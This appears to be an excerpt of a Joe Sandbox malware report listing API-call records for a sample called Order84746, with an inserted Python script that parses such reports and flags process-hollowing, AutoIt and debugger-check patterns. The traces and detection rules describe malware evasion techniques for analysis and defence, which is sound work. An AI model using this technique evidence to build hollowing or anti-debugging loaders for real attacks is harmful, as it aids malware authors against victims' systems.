                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: File$CloseCreateHandleTime
                          • String ID:
                          • API String ID: 3397143404-0
                          • Opcode ID: c0a9cb76550b3c865894b4e09d6768d2e9ddae93895b8da972751c695c2fbbf4
                          • Instruction ID: 811c4dd10c1697d890526484b5cf801a99ccc63925ad6c94b25692c86ac29ca1
                          • Opcode Fuzzy Hash: c0a9cb76550b3c865894b4e09d6768d2e9ddae93895b8da972751c695c2fbbf4
                          • Instruction Fuzzy Hash: 75E08632645224B7D7211B54AC09FCE7B18AB05760F104114FB24690E097F125119798
                          APIs
                          • _free.LIBCMT ref: 0092BB72
                            • Part of subcall function 00901C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00907A85), ref: 00901CB1
                            • Part of subcall function 00901C9D: GetLastError.KERNEL32(00000000,?,00907A85), ref: 00901CC3
                          • _free.LIBCMT ref: 0092BB83
                          • _free.LIBCMT ref: 0092BB95
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                          • Instruction ID: 05310fe9fefef2d54727fa55eb4cceeb23340ebe7c7e7f290e8680906898ef6e
                          • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                          • Instruction Fuzzy Hash: AEE012A26417614AEA2465B97E4CFB313CC4F45351714081DB59AE718ACF24F84089A4
                          APIs
                            • Part of subcall function 008E22A4: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 008E2303
                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008E25A1
                          • CoInitialize.OLE32(00000000), ref: 008E2618
                          • CloseHandle.KERNEL32(00000000), ref: 0095503A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Handle$ClipboardCloseFormatInitializeRegister
                          • String ID:
                          • API String ID: 458326420-0
                          • Opcode ID: f0e31230d1acf038b70b8dc1e7e6a062dceefcf2b31a94a130882602bfec0426
                          • Instruction ID: f59b9bdc69a8a4aa305a3d341293272a8c14a7c502b0a2afb5668743a2ae3875
                          • Opcode Fuzzy Hash: f0e31230d1acf038b70b8dc1e7e6a062dceefcf2b31a94a130882602bfec0426
                          • Instruction Fuzzy Hash: 9271B2B89293958B8714DF5EAD90654BBE4FF9B384F80412ED929C76B1CB308404EFD5
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __fread_nolock
                          • String ID: EA06
                          • API String ID: 2638373210-3962188686
                          • Opcode ID: 8ef40e1db507a9689c94d676b47f00ec059bc1b2a9f7528a07fe54c64e331170
                          • Instruction ID: 3f55e72c58525866e90272e22d523e4ba519c360f5857c4c2af45f2dbabc1c0c
                          • Opcode Fuzzy Hash: 8ef40e1db507a9689c94d676b47f00ec059bc1b2a9f7528a07fe54c64e331170
                          • Instruction Fuzzy Hash: 0801B5729042187EDB28C7A8C856FEEBBFC9B15305F00859AF592D61C1E5B4A7088B60
                          APIs
                          • 745EC8D0.UXTHEME ref: 008E3A73
                            • Part of subcall function 00901405: __lock.LIBCMT ref: 0090140B
                            • Part of subcall function 008E3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 008E3AF3
                            • Part of subcall function 008E3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008E3B08
                            • Part of subcall function 008E3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,008E3AA3,?), ref: 008E3D45
                            • Part of subcall function 008E3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,008E3AA3,?), ref: 008E3D57
                            • Part of subcall function 008E3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,009A1148,009A1130,?,?,?,?,008E3AA3,?), ref: 008E3DC8
                            • Part of subcall function 008E3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,008E3AA3,?), ref: 008E3E48
                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008E3AB3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                          • String ID:
                          • API String ID: 3809921791-0
                          • Opcode ID: 18a75aeb59b5a573fe2da24e768bda14bb468d40b896903fbe12d23b9b32c77e
                          • Instruction ID: e96fc7743f67117934f05ae8b805c19adb09ac496e550571fb21fc59d5cc4055
                          • Opcode Fuzzy Hash: 18a75aeb59b5a573fe2da24e768bda14bb468d40b896903fbe12d23b9b32c77e
                          • Instruction Fuzzy Hash: 6411A971A1C3549FC300EF6AE80991ABBE8FF96750F00891EF584832B1DB708984DBD2
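Several of the function records above carry recognisable technique evidence: CreateProcessW followed by Wow64GetThreadContext and a 4-byte ReadProcessMemory, emitted from the region at 011D8000 that the report marks "based on PE: false" (i.e. code that was not mapped from the executable on disk), is the opening of a RunPE / process-hollowing routine; GetTempFileNameW with the prefix "aut" and the string "EA06" are artefacts of the AutoIt runtime and its compiled-script resource; IsDebuggerPresent reached from subcall 008E3D19 is a plain debugger check. The Python below is an added example and is not part of the Joe Sandbox report or its IDA plugin output: it parses report bullets in the exact format shown on this page, groups them per function record, and flags those patterns. The sample input is transcribed and condensed from the blocks above (constructed for the example); the technique labels, rule thresholds and the `FuncBlock`/`ApiCall` names are this example's own assumptions, not anything the report defines.

```python
import re
from dataclasses import dataclass, field

# One report bullet: "• Name.MODULE(args), ref: ADDR"; subcall entries carry a prefix.
API_LINE = re.compile(
    r"^\s*•?\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>[\w@:]+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
STRING_ID = re.compile(r"^\s*•\s*String ID:\s*(?P<s>.*?)\s*$")
SOURCE = re.compile(r"Offset:\s*(?P<base>[0-9A-F]+),\s*based on PE:\s*(?P<pe>true|false)")
BLOCK_END = "Instruction Fuzzy Hash:"   # last line of every function record


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: str
    direct: bool          # False when listed as "Part of subcall function"


@dataclass
class FuncBlock:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    base: str = ""
    pe_backed: bool = True  # "based on PE: false" = region not mapped from the exe on disk


def parse_blocks(text):
    """Split report text into one FuncBlock per 'Instruction Fuzzy Hash' record."""
    blocks, cur = [], FuncBlock()
    for line in text.splitlines():
        if BLOCK_END in line:
            blocks.append(cur)
            cur = FuncBlock()
        elif (m := API_LINE.match(line)):
            args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
            cur.calls.append(ApiCall(m.group("api"), m.group("module"), args,
                                     m.group("ref"), m.group("sub") is None))
        elif (m := STRING_ID.match(line)) and m.group("s"):
            # Joe Sandbox joins several IDs with '$' (see the "API ID" lines on the page)
            cur.strings.extend(s for s in m.group("s").split("$") if s)
        elif (m := SOURCE.search(line)):
            cur.base, cur.pe_backed = m.group("base"), m.group("pe") == "true"
    if cur.calls or cur.strings or cur.base:
        blocks.append(cur)
    return blocks


def flag_block(b):
    """Technique labels (this example's own names) supported by one block's evidence."""
    apis = {c.api for c in b.calls}
    hits = []
    # create child, take its thread context, read its memory: opening of a RunPE/hollowing routine
    if ("CreateProcessW" in apis and apis & {"GetThreadContext", "Wow64GetThreadContext"}
            and apis & {"ReadProcessMemory", "WriteProcessMemory"}):
        hits.append("process-hollowing (RunPE) sequence")
    if b.calls and not b.pe_backed:
        hits.append("code running outside any PE image (unpacked/injected region)")
    if any(c.api == "GetTempFileNameW" and "aut" in c.args for c in b.calls):
        hits.append("AutoIt temp file prefix 'aut'")
    if "EA06" in b.strings:
        hits.append("AutoIt compiled-script marker EA06")
    if "IsDebuggerPresent" in apis:
        hits.append("debugger presence check")
    return hits


def scan(text):
    """(first call ref, or image base when the record lists no calls) -> labels, per flagged block."""
    out = []
    for b in parse_blocks(text):
        hits = flag_block(b)
        if hits:
            out.append((b.calls[0].ref if b.calls else b.base, hits))
    return out


# Constructed input: transcribed and condensed from the report records above.
SAMPLE_REPORT = r"""
APIs
• RegCloseKey.KERNELBASE(00000000,?,?,008FD28B,SwapMouseButtons,00000004,?,?,?,?,008FC865), ref: 008FD2FF
• Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• String ID: Control Panel\Mouse
• Instruction Fuzzy Hash: BA115775A1520CBFDB218FA8CC84EBE7BB9EF05744B004429EA01D7220E671AE40AB60
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 011DA693
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 011DA729
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 011DA74B
• Source File: 00000000.00000002.1678053935.00000000011D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 011D8000, based on PE: false
• String ID:
• Instruction Fuzzy Hash: 3C620F30A14658DBEB28CFA4D850BDEB771EF58300F1091A9D10DEB390E7759E81CB5A
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 0092C72F
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0092C746
• Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• String ID: aut
• Instruction Fuzzy Hash: 15D05E71A0430EABDB10AB90DC0EF8A776C9B04708F0001A0B660E50B1DAF1E6998B54
APIs
• Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• String ID: EA06
• Instruction Fuzzy Hash: 0801B5729042187EDB28C7A8C856FEEBBFC9B15305F00859AF592D61C1E5B4A7088B60
APIs
• 745EC8D0.UXTHEME ref: 008E3A73
  • Part of subcall function 008E3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,008E3AA3,?), ref: 008E3D57
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008E3AB3
• Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Instruction Fuzzy Hash: 6411A971A1C3549FC300EF6AE80991ABBE8FF96750F00891EF584832B1DB708984DBD2
"""

if __name__ == "__main__":
    for key, hits in scan(SAMPLE_REPORT):
        print(key, "->", "; ".join(hits))
```

Feeding it the whole "Joe Sandbox IDA Plugin" section of a report (copy the text of the page) prints one line per flagged record keyed by the first call's ref address, which is the address to jump to in the memory dump. Note that the hollowing rule only fires when all three API families sit in the same function record; a loader that splits CreateProcessW and the WriteProcessMemory/SetThreadContext half across two functions needs a cross-record rule, which this example deliberately does not attempt.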
                          APIs
                          • ___lock_fhandle.LIBCMT ref: 0090EA29
                          • __close_nolock.LIBCMT ref: 0090EA42
                            • Part of subcall function 00907BDA: __getptd_noexit.LIBCMT ref: 00907BDA
                            • Part of subcall function 00907C0E: __getptd_noexit.LIBCMT ref: 00907C0E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                          • String ID:
                          • API String ID: 1046115767-0
                          • Opcode ID: 33c61a338031d25d01afa18151448fddf9b89d529b3e0e20abe30bfe9e7e3d1c
                          • Instruction ID: fe63f72aa43fe22f550857ad2d658db48aa5b602c00bf0fafe21ccaf6dc6a41e
                          • Opcode Fuzzy Hash: 33c61a338031d25d01afa18151448fddf9b89d529b3e0e20abe30bfe9e7e3d1c
                          • Instruction Fuzzy Hash: E911C872A096108FE711BFA8C841359BBA16FC6331F264B40E4705F2E3CBB89C409BE5
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __lock_file_memset
                          • String ID:
                          • API String ID: 26237723-0
                          • Opcode ID: 4f8816fb7f9e31a9a34c78ef6b2ecc5164098a26d7d82ee975b1e7723e791759
                          • Instruction ID: 25e3358dea5cddcec63392e51e8e16173c5aad4ff945edea02d6d749a36417ce
                          • Opcode Fuzzy Hash: 4f8816fb7f9e31a9a34c78ef6b2ecc5164098a26d7d82ee975b1e7723e791759
                          • Instruction Fuzzy Hash: FA014472D00209EFCF22BFA5CC0669E7B69AFC0360F15C659F824561E1D7718B61DB91
                          APIs
                            • Part of subcall function 00907C0E: __getptd_noexit.LIBCMT ref: 00907C0E
                          • __lock_file.LIBCMT ref: 00903629
                            • Part of subcall function 00904E1C: __lock.LIBCMT ref: 00904E3F
                          • __fclose_nolock.LIBCMT ref: 00903634
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                          • String ID:
                          • API String ID: 2800547568-0
                          • Opcode ID: 8b204d04dd319074fb5541c1af8eb7d6f937fe20b7a63aaeae19ecff09393802
                          • Instruction ID: b84b781cfcf31a7dc09a968a182ce49806fbd84ac22b8b6fd6738c9f227bd109
                          • Opcode Fuzzy Hash: 8b204d04dd319074fb5541c1af8eb7d6f937fe20b7a63aaeae19ecff09393802
                          • Instruction Fuzzy Hash: F5F0B471941704AEEB117F66C80776EBAAC6F80334F29C508E424EB2D1CB7C8A419F95
                          APIs
                          • CreateProcessW.KERNELBASE(?,00000000), ref: 011DA693
                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 011DA729
                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 011DA74B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1678053935.00000000011D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 011D8000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_11d8000_Order84746.jbxd
                          Similarity
                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                          • String ID:
                          • API String ID: 2438371351-0
                          • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                          • Instruction ID: f1b775875acca5ba1a18d52efb03d0369bdd60c80e1910fc3ff10e9eed5a56d1
                          • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                          • Instruction Fuzzy Hash: 3012DE24E18658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7A5E77A4F81CF5A
                          APIs
                          • __flush.LIBCMT ref: 00902A0B
                            • Part of subcall function 00907C0E: __getptd_noexit.LIBCMT ref: 00907C0E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __flush__getptd_noexit
                          • String ID:
                          • API String ID: 4101623367-0
                          • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                          • Instruction ID: f375bdf6e8d4010384b1d486101d5214de377386e1115e5d3f6a69c112f38d80
                          • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                          • Instruction Fuzzy Hash: 144194717007069FDF2C8FA9C9895AE7BAAAF84360F24853DE855C72C0EB74DD418B50
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                          • Instruction ID: 778fbe5674c5c879746a80562f370dc16c765debf0222ca90fb1946083a2edd5
                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                          • Instruction Fuzzy Hash: FD31C474A0010DDBD718EF6CC480A79FBA6FF49344B6486A5E509CBA66DB31EDC1CB90
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID:
                          • API String ID: 1473721057-0
                          • Opcode ID: 084618bbf65c67bb006889d164855784f72a214228730f851d3c679230aee2e7
                          • Instruction ID: f15168472bcb486ef55658a68b77e67d27d5d3363a1c83e613b29ee6f0d75f41
                          • Opcode Fuzzy Hash: 084618bbf65c67bb006889d164855784f72a214228730f851d3c679230aee2e7
                          • Instruction Fuzzy Hash: 07413E74504655CFEB24DF29C484B2ABBE0FF45308F19895CEA968B362C772E845CF52
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __getptd_noexit
                          • String ID:
                          • API String ID: 3074181302-0
                          • Opcode ID: 7cf957578b230d449b7d0b15876ce02d5352d325ed99bd77b28d66b10364fcf5
                          • Instruction ID: cee8994a90d80197ec81daca24dd7fceb1c6ba69f3abf6d52e623d3b2cf76ddc
                          • Opcode Fuzzy Hash: 7cf957578b230d449b7d0b15876ce02d5352d325ed99bd77b28d66b10364fcf5
                          • Instruction Fuzzy Hash: 922190728186148FE712BFA8CC453597B61AFC2336F264E40F4704F2E2DBB49C509BA1
                          APIs
                            • Part of subcall function 008E4214: FreeLibrary.KERNEL32(00000000,?), ref: 008E4247
                          • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,008E39FE,?,00000001), ref: 008E41DB
                            • Part of subcall function 008E4291: FreeLibrary.KERNEL32(00000000), ref: 008E42C4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Library$Free$Load
                          • String ID:
                          • API String ID: 2391024519-0
                          • Opcode ID: f8f23255285f47ebde9df68b59a007db78ee8d63604d52917a60bcca58dae265
                          • Instruction ID: 3687dd45f736a9d4de12c36c88c03e0618b5dc731075bbf2da7fe6529c67684e
                          • Opcode Fuzzy Hash: f8f23255285f47ebde9df68b59a007db78ee8d63604d52917a60bcca58dae265
                          • Instruction Fuzzy Hash: 6511EB31600305ABCB10FB7ADD16F9D77E9EF41704F108429FA5AE61C1DB749A449B61
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
